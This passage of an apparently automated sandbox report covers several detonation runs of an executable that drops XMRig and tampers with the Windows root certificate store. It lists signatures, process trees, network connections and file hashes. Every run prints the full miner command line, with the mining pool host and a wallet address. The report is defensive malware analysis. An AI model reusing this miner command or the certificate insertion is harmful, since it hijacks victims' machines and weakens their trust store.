memory/8-58-0x00007FF6BB3A0000-0x00007FF6BBEA3000-memory.dmp
memory/8-59-0x00007FF6BB3A0000-0x00007FF6BBEA3000-memory.dmp
memory/8-60-0x00007FF6BB3A0000-0x00007FF6BBEA3000-memory.dmp
memory/8-61-0x00007FF6BB3A0000-0x00007FF6BBEA3000-memory.dmp
memory/8-62-0x00007FF6BB3A0000-0x00007FF6BBEA3000-memory.dmp
memory/8-63-0x00007FF6BB3A0000-0x00007FF6BBEA3000-memory.dmp
memory/8-64-0x00007FF6BB3A0000-0x00007FF6BBEA3000-memory.dmp
memory/8-65-0x00007FF6BB3A0000-0x00007FF6BBEA3000-memory.dmp
memory/8-66-0x00007FF6BB3A0000-0x00007FF6BBEA3000-memory.dmp
memory/8-67-0x00007FF6BB3A0000-0x00007FF6BBEA3000-memory.dmp
memory/8-68-0x00007FF6BB3A0000-0x00007FF6BBEA3000-memory.dmp
memory/8-69-0x00007FF6BB3A0000-0x00007FF6BBEA3000-memory.dmp
memory/8-70-0x00007FF6BB3A0000-0x00007FF6BBEA3000-memory.dmp
memory/8-71-0x00007FF6BB3A0000-0x00007FF6BBEA3000-memory.dmp
memory/8-72-0x00007FF6BB3A0000-0x00007FF6BBEA3000-memory.dmp
memory/8-73-0x00007FF6BB3A0000-0x00007FF6BBEA3000-memory.dmp
memory/8-74-0x00007FF6BB3A0000-0x00007FF6BBEA3000-memory.dmp
memory/8-75-0x00007FF6BB3A0000-0x00007FF6BBEA3000-memory.dmp
memory/8-76-0x00007FF6BB3A0000-0x00007FF6BBEA3000-memory.dmp
memory/8-77-0x00007FF6BB3A0000-0x00007FF6BBEA3000-memory.dmp
memory/8-78-0x00007FF6BB3A0000-0x00007FF6BBEA3000-memory.dmp
memory/8-79-0x00007FF6BB3A0000-0x00007FF6BBEA3000-memory.dmp
memory/8-80-0x00007FF6BB3A0000-0x00007FF6BBEA3000-memory.dmp
memory/8-81-0x00007FF6BB3A0000-0x00007FF6BBEA3000-memory.dmp
memory/8-82-0x00007FF6BB3A0000-0x00007FF6BBEA3000-memory.dmp
memory/8-83-0x00007FF6BB3A0000-0x00007FF6BBEA3000-memory.dmp
memory/8-84-0x00007FF6BB3A0000-0x00007FF6BBEA3000-memory.dmp
Analysis: behavioral3
Detonation Overview
Submitted
2024-05-22 14:45
Reported
2024-05-22 15:50
Platform
win10v2004-20240508-en
Max time kernel
1793s
Max time network
1790s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = (value elided) | C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2472 wrote to memory of 2516 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 2472 wrote to memory of 2516 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| NL | 23.62.61.160:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 160.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| NL | 23.62.61.75:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 75.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| NL | 23.62.61.97:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 97.61.62.23.in-addr.arpa | udp |
| NL | 23.62.61.97:443 | www.bing.com | tcp |
| NL | 23.62.61.97:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 17.173.189.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/2516-16-0x0000023F0E6E0000-0x0000023F0E700000-memory.dmp
memory/2516-17-0x0000023F0E740000-0x0000023F0E760000-memory.dmp
memory/2516-18-0x00007FF7213B0000-0x00007FF721EB3000-memory.dmp
memory/2516-20-0x0000023F0E760000-0x0000023F0E780000-memory.dmp
memory/2516-19-0x0000023F0E780000-0x0000023F0E7A0000-memory.dmp
memory/2516-21-0x00007FF7213B0000-0x00007FF721EB3000-memory.dmp
memory/2516-22-0x00007FF7213B0000-0x00007FF721EB3000-memory.dmp
memory/2516-23-0x00007FF7213B0000-0x00007FF721EB3000-memory.dmp
memory/2516-25-0x0000023F0E760000-0x0000023F0E780000-memory.dmp
memory/2516-24-0x0000023F0E780000-0x0000023F0E7A0000-memory.dmp
memory/2516-26-0x00007FF7213B0000-0x00007FF721EB3000-memory.dmp
memory/2516-27-0x00007FF7213B0000-0x00007FF721EB3000-memory.dmp
memory/2516-28-0x00007FF7213B0000-0x00007FF721EB3000-memory.dmp
memory/2516-29-0x00007FF7213B0000-0x00007FF721EB3000-memory.dmp
memory/2516-30-0x00007FF7213B0000-0x00007FF721EB3000-memory.dmp
memory/2516-31-0x00007FF7213B0000-0x00007FF721EB3000-memory.dmp
memory/2516-32-0x00007FF7213B0000-0x00007FF721EB3000-memory.dmp
memory/2516-33-0x00007FF7213B0000-0x00007FF721EB3000-memory.dmp
memory/2516-34-0x00007FF7213B0000-0x00007FF721EB3000-memory.dmp
memory/2516-35-0x00007FF7213B0000-0x00007FF721EB3000-memory.dmp
memory/2516-36-0x00007FF7213B0000-0x00007FF721EB3000-memory.dmp
memory/2516-37-0x00007FF7213B0000-0x00007FF721EB3000-memory.dmp
memory/2516-38-0x00007FF7213B0000-0x00007FF721EB3000-memory.dmp
memory/2516-39-0x00007FF7213B0000-0x00007FF721EB3000-memory.dmp
memory/2516-40-0x00007FF7213B0000-0x00007FF721EB3000-memory.dmp
memory/2516-41-0x00007FF7213B0000-0x00007FF721EB3000-memory.dmp
memory/2516-42-0x00007FF7213B0000-0x00007FF721EB3000-memory.dmp
memory/2516-43-0x00007FF7213B0000-0x00007FF721EB3000-memory.dmp
memory/2516-44-0x00007FF7213B0000-0x00007FF721EB3000-memory.dmp
memory/2516-45-0x00007FF7213B0000-0x00007FF721EB3000-memory.dmp
memory/2516-46-0x00007FF7213B0000-0x00007FF721EB3000-memory.dmp
memory/2516-47-0x00007FF7213B0000-0x00007FF721EB3000-memory.dmp
memory/2516-48-0x00007FF7213B0000-0x00007FF721EB3000-memory.dmp
memory/2516-49-0x00007FF7213B0000-0x00007FF721EB3000-memory.dmp
memory/2516-50-0x00007FF7213B0000-0x00007FF721EB3000-memory.dmp
memory/2516-51-0x00007FF7213B0000-0x00007FF721EB3000-memory.dmp
memory/2516-52-0x00007FF7213B0000-0x00007FF721EB3000-memory.dmp
memory/2516-53-0x00007FF7213B0000-0x00007FF721EB3000-memory.dmp
memory/2516-54-0x00007FF7213B0000-0x00007FF721EB3000-memory.dmp
memory/2516-55-0x00007FF7213B0000-0x00007FF721EB3000-memory.dmp
memory/2516-56-0x00007FF7213B0000-0x00007FF721EB3000-memory.dmp
memory/2516-57-0x00007FF7213B0000-0x00007FF721EB3000-memory.dmp
memory/2516-58-0x00007FF7213B0000-0x00007FF721EB3000-memory.dmp
memory/2516-59-0x00007FF7213B0000-0x00007FF721EB3000-memory.dmp
memory/2516-60-0x00007FF7213B0000-0x00007FF721EB3000-memory.dmp
memory/2516-61-0x00007FF7213B0000-0x00007FF721EB3000-memory.dmp
memory/2516-62-0x00007FF7213B0000-0x00007FF721EB3000-memory.dmp
memory/2516-63-0x00007FF7213B0000-0x00007FF721EB3000-memory.dmp
memory/2516-64-0x00007FF7213B0000-0x00007FF721EB3000-memory.dmp
memory/2516-65-0x00007FF7213B0000-0x00007FF721EB3000-memory.dmp
memory/2516-66-0x00007FF7213B0000-0x00007FF721EB3000-memory.dmp
memory/2516-67-0x00007FF7213B0000-0x00007FF721EB3000-memory.dmp
memory/2516-68-0x00007FF7213B0000-0x00007FF721EB3000-memory.dmp
memory/2516-69-0x00007FF7213B0000-0x00007FF721EB3000-memory.dmp
memory/2516-70-0x00007FF7213B0000-0x00007FF721EB3000-memory.dmp
memory/2516-71-0x00007FF7213B0000-0x00007FF721EB3000-memory.dmp
memory/2516-72-0x00007FF7213B0000-0x00007FF721EB3000-memory.dmp
memory/2516-73-0x00007FF7213B0000-0x00007FF721EB3000-memory.dmp
memory/2516-74-0x00007FF7213B0000-0x00007FF721EB3000-memory.dmp
memory/2516-75-0x00007FF7213B0000-0x00007FF721EB3000-memory.dmp
memory/2516-76-0x00007FF7213B0000-0x00007FF721EB3000-memory.dmp
memory/2516-77-0x00007FF7213B0000-0x00007FF721EB3000-memory.dmp
memory/2516-78-0x00007FF7213B0000-0x00007FF721EB3000-memory.dmp
memory/2516-79-0x00007FF7213B0000-0x00007FF721EB3000-memory.dmp
memory/2516-80-0x00007FF7213B0000-0x00007FF721EB3000-memory.dmp
memory/2516-81-0x00007FF7213B0000-0x00007FF721EB3000-memory.dmp
memory/2516-82-0x00007FF7213B0000-0x00007FF721EB3000-memory.dmp
memory/2516-83-0x00007FF7213B0000-0x00007FF721EB3000-memory.dmp
memory/2516-84-0x00007FF7213B0000-0x00007FF721EB3000-memory.dmp
Analysis: behavioral5
Detonation Overview
Submitted
2024-05-22 14:45
Reported
2024-05-22 15:51
Platform
win10v2004-20240508-en
Max time kernel
1791s
Max time network
1785s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (3).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (3).exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1284 wrote to memory of 3092 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (3).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 1284 wrote to memory of 3092 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (3).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (3).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (3).exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 83.211.222.173.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.24.18.2.in-addr.arpa | udp |
| US | 52.111.227.11:443 | | tcp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| NL | 23.62.61.75:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 75.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 27.73.42.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
Analysis: behavioral6
Detonation Overview
Submitted
2024-05-22 14:45
Reported
2024-05-22 15:52
Platform
win10v2004-20240508-en
Max time kernel
1792s
Max time network
1801s
Command Line
Signatures
XMRig Miner payload
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 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 | C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 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 | C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4908 wrote to memory of 2244 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 4908 wrote to memory of 2244 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 16.173.189.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
Analysis: behavioral20
Detonation Overview
Submitted
2024-05-22 14:45
Reported
2024-05-22 16:14
Platform
win10v2004-20240508-en
Max time kernel
1794s
Max time network
1799s
Command Line
Signatures
XMRig Miner payload
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 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 | C:\Users\Admin\AppData\Local\Temp\main.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 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 | C:\Users\Admin\AppData\Local\Temp\main.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4836 wrote to memory of 1924 | N/A | C:\Users\Admin\AppData\Local\Temp\main.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 4836 wrote to memory of 1924 | N/A | C:\Users\Admin\AppData\Local\Temp\main.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main.exe
"C:\Users\Admin\AppData\Local\Temp\main.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4000,i,1999448010053300448,1112699187621658374,262144 --variations-seed-version --mojo-platform-channel-handle=4228 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4756,i,1999448010053300448,1112699187621658374,262144 --variations-seed-version --mojo-platform-channel-handle=1008 /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.142.211.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.53.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| NL | 23.62.61.185:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 185.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
